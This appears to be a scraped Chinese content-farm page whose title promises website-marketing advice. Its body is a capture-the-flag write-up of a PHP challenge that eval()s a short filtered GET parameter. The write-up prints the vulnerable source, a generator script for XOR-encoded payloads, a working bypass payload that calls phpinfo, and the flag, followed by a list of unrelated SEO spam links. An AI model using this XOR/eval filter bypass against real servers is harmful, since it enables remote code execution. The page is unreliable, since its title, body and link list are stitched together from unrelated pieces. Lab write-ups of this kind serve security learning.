当前位置: 首页 > wzjs >正文

网站前期建设浅谈一下网络营销的几个误区

网站前期建设,浅谈一下网络营销的几个误区,做网站要会编程么,2022年企业所得税税率进入靶场 代码审计 <?php // 定义函数get_the_flag&#xff0c;功能是处理文件上传相关操作 function get_the_flag() {// 注释说明&#xff1a;webadmin会每隔20分钟删除用户上传的文件$userdir "upload/tmp_" . md5($_SERVER[REMOTE_ADDR]);// 检查用户目录…

进入靶场

代码审计

<?php
// 定义函数get_the_flag,功能是处理文件上传相关操作
function get_the_flag() {// 注释说明:webadmin会每隔20分钟删除用户上传的文件$userdir = "upload/tmp_" . md5($_SERVER['REMOTE_ADDR']);// 检查用户目录是否存在,如果不存在则创建if (!file_exists($userdir)) {mkdir($userdir);}// 检查是否有文件上传if (!empty($_FILES["file"])) {$tmp_name = $_FILES["file"]["tmp_name"];  // 获取上传文件在服务器上的临时文件名$name = $_FILES["file"]["name"];  // 获取上传文件的原始文件名// 获取上传文件的扩展名$extension = substr($name, strrpos($name, ".") + 1);// 检查扩展名是否包含"ph"(不区分大小写),如果包含则终止脚本执行if (preg_match("/ph/i", $extension)) die("^_^");// 检查上传文件内容是否包含"<?", 如果包含则终止脚本执行if (mb_strpos(file_get_contents($tmp_name), '<?')!== False) die("^_^");// 检查上传文件是否是有效的图像类型,不是则终止脚本执行if (!exif_imagetype($tmp_name)) die("^_^");$path = $userdir. "/" . $name;  // 构建上传文件的目标路径// 尝试将上传文件从临时位置移动到目标位置@move_uploaded_file($tmp_name, $path);print_r($path);  // 打印文件的保存路径}
}// 从GET请求参数中获取名为"_"的参数值,并赋值给变量$hhh
$hhh = @$_GET['_'];// 如果$hhh没有值,高亮显示当前文件内容
if (!$hhh) {highlight_file(__FILE__);
}// 如果$hhh的长度大于18,终止脚本执行并输出提示信息
if (strlen($hhh) > 18) {die('One inch long, one inch strong!');
}// 使用正则表达式检查$hhh是否包含特定字符集(包括一些常见字符和控制字符等),如果包含则终止脚本执行
if (preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh))die('Try something else!');// 获取$hhh中使用到的字符,并以字符形式返回
$character_type = count_chars($hhh, 3);
// 如果$character_type的长度大于12,终止脚本执行并输出提示信息
if (strlen($character_type) > 12) die("Almost there!");// 执行$hhh中的PHP代码,存在严重的代码执行漏洞风险
eval($hhh);
?>

 实现了文件上传功能,并对上传文件进行了一些限制和检查

条件好苛刻

<?php
// 初始化两个空字符串,用于存储生成的内容
$l = "";
$r = "";
// 将字符串_GET拆分成字符数组
$argv = str_split("_GET");
// 遍历字符数组中的每个字符
for ($i = 0; $i < count($argv); $i++) {// 遍历0到254的整数for ($j = 0; $j < 255; $j++) {// 将字符$j对应的ASCII码值与255进行按位异或操作,然后转换回字符$k = chr($j) ^ chr(255);// 如果异或结果与当前字符匹配if ($k == $argv[$i]) {// 如果$j小于16,在$r中添加十六进制表示时在前面补0if ($j < 16) {$l.= "%ff";$r.= "%0". dechex($j);continue;}$l.= "%ff";$r.= "%". dechex($j);continue;}}
}
// 输出包含$l、字符$和$r的字符串
echo "\{$l`$r\}";
?>

{%ff%ff%ff%ff`%a0%b8%ba%ab}

?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo 

flag{dc834348-3be9-4eff-abc1-150000430933} 

http://www.dtcms.com/wzjs/96790.html

相关文章:

  • 青岛工商注册核名查询系统郑州百度seo关键词
  • 喊别人做的网站不肯给代码百度app推广方法
  • 哈尔滨网站建设效果好教育培训机构官网
  • 网站及邮件系统建设合肥seo推广公司
  • 郑州公司网站建设服务一个自己的网站
  • 公司网站建设的视频教程百度推广多少钱
  • 百度竞价网站谁做郑州做网站公司排名
  • 上海购房网官网开鲁网站seo不用下载
  • 建个人网站精准ip地址查询工具
  • 抓取网站访客qqseo黑帽多久入门
  • 网站最好服务器关键词网站
  • 广州企立科技做网站建立自己的网站平台
  • 江苏公众科技网站建设搜狗站长工具平台
  • 手机网站分辨率做多大网络口碑营销
  • 电子商务公司网站怎么建百度权重4网站值多少钱
  • 怎么做网站调查表免费的个人网页
  • 做代收水果是什么网站seo搜索引擎优化营销案例
  • 郑州建网站哪个公司好网上国网app推广方案
  • 建设部网站关于乡建助理职责自媒体发布平台
  • 做网站什么是三网合一广告宣传方式有哪些
  • 昆明建设网站制作企业培训平台
  • 网站建设我要自学网2022知名品牌营销案例100例
  • 做网站需要走公司吗关键词排名怎么做上去
  • 工程建设招标中心网站短视频培训课程
  • 做暧免费观看网站纯注册app拉新平台
  • 大数据做网站流量分析百度搜索引擎属于什么引擎
  • 网站建设及使用青岛爱城市网app官方网站
  • 新建网站seo优化怎么做新冠疫情最新情况最新消息
  • 提供服务的网站搜索引擎网站排名优化方案
  • 西宁做网站公司哪家好网络推广的公司更可靠